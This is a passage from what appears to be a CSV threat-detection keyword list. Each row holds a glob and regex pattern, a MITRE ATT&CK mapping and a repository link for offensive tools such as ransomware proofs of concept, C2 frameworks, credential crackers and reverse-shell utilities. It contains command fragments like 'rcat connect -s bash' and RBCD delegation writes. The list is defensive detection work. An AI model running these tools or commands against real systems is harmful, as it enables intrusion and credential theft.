TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*Ransomware POC tool that encrypts a given directory*",".{0,1000}Ransomware\sPOC\stool\sthat\sencrypts\sa\sgiven\sdirectory.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*Ransomware.dll*",".{0,1000}Ransomware\.dll.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*Ransomware.pdb*",".{0,1000}Ransomware\.pdb.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*ransomware_config.py*",".{0,1000}ransomware_config\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*ransomware_payload.py*",".{0,1000}ransomware_payload\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*Ransomware-E20F7CED-42AD-485E-BE4D-DE21DCE58EC0.json*",".{0,1000}Ransomware\-E20F7CED\-42AD\-485E\-BE4D\-DE21DCE58EC0\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*RansomwarePoc.cpp*",".{0,1000}RansomwarePoc\.cpp.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*RansomwarePoc.exe*",".{0,1000}RansomwarePoc\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*RansomwarePoc\RansomwarePoc*",".{0,1000}RansomwarePoc\\RansomwarePoc.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*Rapid7*",".{0,1000}Rapid7.{0,1000}","offensive_tool_keyword","rapid7","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.rapid7.com/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*rapid7.github.io/metasploit-framework/api/*",".{0,1000}rapid7\.github\.io\/metasploit\-framework\/api\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Rar a -v3g -k -r -s -m3 *",".{0,1000}Rar\sa\s\-v3g\s\-k\s\-r\s\-s\s\-m3\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*rar2john *",".{0,1000}rar2john\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*rar2john.*",".{0,1000}rar2john\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*rarce *.pdf *.rar*",".{0,1000}rarce\s.{0,1000}\.pdf\s.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*rarce *.rar*",".{0,1000}rarce\s.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*rarce-1.0.0.tar.gz*",".{0,1000}rarce\-1\.0\.0\.tar\.gz.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*rarce-1.0.0-py3-none-any.whl*",".{0,1000}rarce\-1\.0\.0\-py3\-none\-any\.whl.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*rasman*whoami*",".{0,1000}rasman.{0,1000}whoami.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*RasMan.vcxproj*",".{0,1000}RasMan\.vcxproj.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*rasman_c.c*",".{0,1000}rasman_c\.c.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*rasman_h.h*",".{0,1000}rasman_h\.h.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*RasmanPotato-master*",".{0,1000}RasmanPotato\-master.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*rasta-mouse*",".{0,1000}rasta\-mouse.{0,1000}","offensive_tool_keyword","Github Username","github user author of various offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/rasta-mouse","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*rastamouse.me/dumping-lsass-with-duplicated-handles*",".{0,1000}rastamouse\.me\/dumping\-lsass\-with\-duplicated\-handles.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*rasta-mouse/PPEnum*",".{0,1000}rasta\-mouse\/PPEnum.{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","96","8","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z" "*rasta-mouse/RuralBishop*",".{0,1000}rasta\-mouse\/RuralBishop.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","102","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" "*rasta-mouse/SharpC2*",".{0,1000}rasta\-mouse\/SharpC2.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*rasta-mouse/ThreatCheck*",".{0,1000}rasta\-mouse\/ThreatCheck.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*rasta-mouse/TikiTorch*",".{0,1000}rasta\-mouse\/TikiTorch.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*rat communications are NOT SECURE. Do not send sensitive info through the C2 channel unless using SSL*",".{0,1000}rat\scommunications\sare\sNOT\sSECURE\.\sDo\snot\ssend\ssensitive\sinfo\sthrough\sthe\sC2\schannel\sunless\susing\sSSL.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*ratchatPT*/bin/bash*",".{0,1000}ratchatPT.{0,1000}\/bin\/bash.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*RatChatPT.exe*",".{0,1000}RatChatPT\.exe.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*RatChatPT.exe*",".{0,1000}RatChatPT\.exe.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*RatChatPT_windows.exe*",".{0,1000}RatChatPT_windows\.exe.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*RatChatPT_windows.exe*",".{0,1000}RatChatPT_windows\.exe.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*ratchatpt-main*",".{0,1000}ratchatpt\-main.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*ratchatpt-main*",".{0,1000}ratchatpt\-main.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*raw*/straight-shooter.c*",".{0,1000}raw.{0,1000}\/straight\-shooter\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*raw.githubusercontent.com/Flangvik/statistically-likely-usernames/*",".{0,1000}raw\.githubusercontent\.com\/Flangvik\/statistically\-likely\-usernames\/.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection*",".{0,1000}raw\.githubusercontent\.com\/swagkarna\/Bypass\-Tamper\-Protection.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*raw_keylogger *","raw_keylogger\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/trustedsec/SliverKeylogger","1","0","N/A","10","10","139","39","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" "*raw_keylogger.tar.gz*",".{0,1000}raw_keylogger\.tar\.gz.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","10","10","139","39","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" "*rawrelayserver.py*",".{0,1000}rawrelayserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*rawSHA1_linkedIn_fmt_plug*",".{0,1000}rawSHA1_linkedIn_fmt_plug.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*rbcd.py -delegate-from * -delegate-to * -dc-ip * -action write *",".{0,1000}rbcd\.py\s\-delegate\-from\s.{0,1000}\s\-delegate\-to\s.{0,1000}\s\-dc\-ip\s.{0,1000}\s\-action\swrite\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*rbcd.py*",".{0,1000}rbcd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*RBCD_Petitpotam_VulnerableServers.txt*",".{0,1000}RBCD_Petitpotam_VulnerableServers\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*rbsec/dnscan*",".{0,1000}rbsec\/dnscan.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*rc4.py *.bin*",".{0,1000}rc4\.py\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*rcan listen -ib *",".{0,1000}rcan\slisten\s\-ib\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*rcat c -s bash *",".{0,1000}rcat\sc\s\-s\sbash\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*rcat connect -s bash*",".{0,1000}rcat\sconnect\s\-s\sbash.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*rcat connect -s sh *",".{0,1000}rcat\sconnect\s\-s\ssh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*rcat listen 55660*",".{0,1000}rcat\slisten\s55660.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*rcat listen -ie *",".{0,1000}rcat\slisten\s\-ie\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*rcat listen -l *",".{0,1000}rcat\slisten\s\-l\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*rcat-v3.*darwin-aarch64*",".{0,1000}rcat\-v3\..{0,1000}darwin\-aarch64.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*rcat-v3.*-darwin-x86_64*",".{0,1000}rcat\-v3\..{0,1000}\-darwin\-x86_64.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*rcat-v3.*-linux-x86_64*",".{0,1000}rcat\-v3\..{0,1000}\-linux\-x86_64.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*RCE-exploits*",".{0,1000}RCE\-exploits.{0,1000}","offensive_tool_keyword","POC","poc rce - The exploit samples database is a repository for RCE (remote code execution) exploits and Proof-of-Concepts for WINDOWS. the samples are uploaded for education purposes for red and blue teams.","T1059.001 - T1210.001 - T1212 - T1055.012","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/smgorelik/Windows-RCE-exploits","1","1","N/A","N/A","8","734","180","2023-12-11T22:30:33Z","2018-02-13T11:23:40Z" "*RDE1-main.zip*",".{0,1000}RDE1\-main\.zip.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*rdi_net_user.cpp*",".{0,1000}rdi_net_user\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 